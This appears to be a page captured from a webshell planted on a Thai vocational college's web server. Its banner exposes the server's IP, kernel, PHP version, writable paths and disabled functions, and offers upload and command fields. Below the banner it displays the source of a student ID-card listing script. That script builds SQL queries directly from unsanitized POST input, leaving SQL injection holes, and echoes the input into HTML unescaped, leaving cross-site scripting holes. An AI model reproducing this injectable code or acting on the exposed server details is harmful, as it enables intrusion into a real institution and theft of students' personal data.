403Webshell
Server IP : 202.29.229.35  /  Your IP : 18.119.120.88
Web Server : Apache
System : Linux aapanel2 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User : www ( 1001)
PHP Version : 5.5.38
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/www.ivecr2.ac.th/stdcard/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/www.ivecr2.ac.th/stdcard/list_check.php
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">

<!-- Optional theme -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap-theme.min.css">

<!-- Latest compiled and minified JavaScript -->
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
<title>รายชื่อนักเรียนที่ยังไม่มีทำบัตรนักศึกษา</title>
<style>
th{
	text-align: center !important;
}
</style>
</head>

<body>
<?php
require_once("connect/connect.php"); 
if($_POST['id'] == "" && $_POST['name'] == ''){
?>
<form method="post" action="" >
<p>เลือกแผนก <select name="name">
  <option>เลือก</option>
  
<?php
	$query = mysql_query("SELECT DISTINCT minor_name AS name FROM tblstd_idcard, std_chack58
WHERE std_chack58.std_id = tblstd_idcard.student_id"); 
	while($data = mysql_fetch_assoc($query)){
		echo "<option value='".$data['name']."'>".$data['name']."</option>";
	}
?> 
</select></p>
<input type="submit">
</form>
<?php } ?>

<?php
if($_POST['name'] != '' && $_POST['id'] == ""){
	
	?>
    <form method="post" action="" >
    <h1>สาขางาน <?php echo $_POST['name'];?></h1>
    <input type="hidden" name="name" value="<?php echo $_POST['name'];?>" />
<p>ห้อง <select name="id">
  <option>เลือก</option>
  
<?php

	$query = mysql_query("SELECT DISTINCT group_id 
FROM tblstd_idcard, std_chack58
WHERE std_chack58.std_id = tblstd_idcard.student_id
AND minor_name =  '".$_POST['name']."'"); 
	while($data = mysql_fetch_assoc($query)){
		$group = substr($data['group_id'], -1, 1);
		$x = (substr($data['group_id'], 2, 1) == 2)?'ปวช.' : 'ปวส.';
		
		echo "<option value='".$data['group_id']."'>".$x." ".$group." ".$data['group_id']."</option>";
	}
?> 
</select></p>
<input type="submit">
</form>
<?php 
}
?>

<?php
if($_POST['id'] != ''&& $_POST['name'] != ''){
	echo '<a href="http://std-card.lbtech.ac.th/list_check.php">กลับ</a>';
	echo "<center><h3>รายชื่อนักศึกษาที่ยังไม่ได้ทำบัตรนักศึกษา ปีการศึกษา 2558</h3> <h3>แผนกวิชา ".$_POST['name']."</h3>";
	$group = substr($_POST['id'], -1, 1);
	$x = (substr($_POST['id'], 2, 1) == 2)?'ปวช.' : 'ปวส.';
		
	echo "<h3>".$x." 1 กลุ่ม ".$group."</h3></center>";
	$query = mysql_query("SELECT * 
FROM tblstd_idcard, std_chack58
WHERE std_chack58.std_id = tblstd_idcard.student_id
AND minor_name =  '".$_POST['name']."' AND tblstd_idcard.group_id = '".$_POST['id']."'
ORDER BY major_name, student_id"); 

	echo "<table align='center' class='table table-bordered'  style=' width: 600px;'>";
	echo "<tr>";
	echo "<th width='5%' align='center'>".ลำดับ."</th>";
	echo "<th width='15%' align='center'>".รหัสนักศึกษา."</th>";
	//echo "<th>".รหัสบัตรประชาชน."</th>";
	echo "<th width='10%'align='center'>".คำนำหน้า."</th>";
	echo "<th align='center'>".ชื่อ."</th>";
	echo "<th align='center'>".นามสกุล."</th>";
	echo "<th width='20%' align='center'>".สถานะการเข้าเรียน."</th>";
	echo "</tr>";
	$i=1;
	while($data = mysql_fetch_assoc($query)){
	echo "<tr>";
	echo "<td align='center'>".$i++."</td>";
	echo "<td align='center'>".$data['student_id']."</td>";
	//echo "<td>".$data['people_id']."</td>";
	$x = ($data['perfix_id']=='002')?'นาย':'นางสาว';
	echo "<td align='center'>".$x."</td>";
	echo "<td>".$data['stu_fname']."</td>";
	echo "<td>".$data['stu_lname']."</td>";
	echo "<td align='center'>&nbsp;</td>";
	echo "</tr>";
	}
	echo "</table>";
	unset($_POST['id']);
	echo "**สถานะการเข้าเรียน หมายถึง นักเรียน นักศึกษายังมาเรียนปกติ หรือ ลาออก";
}
?>

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit